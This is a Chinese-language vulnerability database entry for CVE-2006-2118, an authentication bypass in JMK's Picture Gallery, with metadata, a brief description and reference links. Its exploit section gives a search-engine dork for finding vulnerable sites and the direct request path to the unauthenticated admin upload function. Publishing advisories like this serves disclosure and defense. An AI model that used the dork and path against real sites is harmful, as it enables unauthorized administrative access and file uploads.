JMK Picture Gallery Admin_Gallery.PHP3 认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195152 漏洞类型 访问验证错误
发布时间 2006-05-01 更新时间 2006-05-02
CVE编号 CVE-2006-2118 CNNVD-ID CNNVD-200605-022
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-022
|漏洞详情
JMK'sPictureGallery可以使远程攻击者借助对admin_gallery.php3的直接请求来绕过验证。可能与add动作有关。
|漏洞EXP
dork: "JMK's Picture Gallery"

and last path to add : admin_gallery.php3?action=add&upload=1

example:hhtp://www.site.com/path/.../admin_gallery.php3?action=add&uploa
d=1

credits:AlpEren,tugr@
|参考资料

来源:BID
名称:17755
链接:http://www.securityfocus.com/bid/17755
来源:BUGTRAQ
名称:20060501JMK'sPictureGalleryadminlogin
链接:http://www.securityfocus.com/archive/1/archive/1/432575/100/0/threaded
来源:XF
名称:jmk-admingallery-unauth-access(26210)
链接:http://xforce.iss.net/xforce/xfdb/26210
来源:SREASON
名称:821
链接:http://securityreason.com/securityalert/821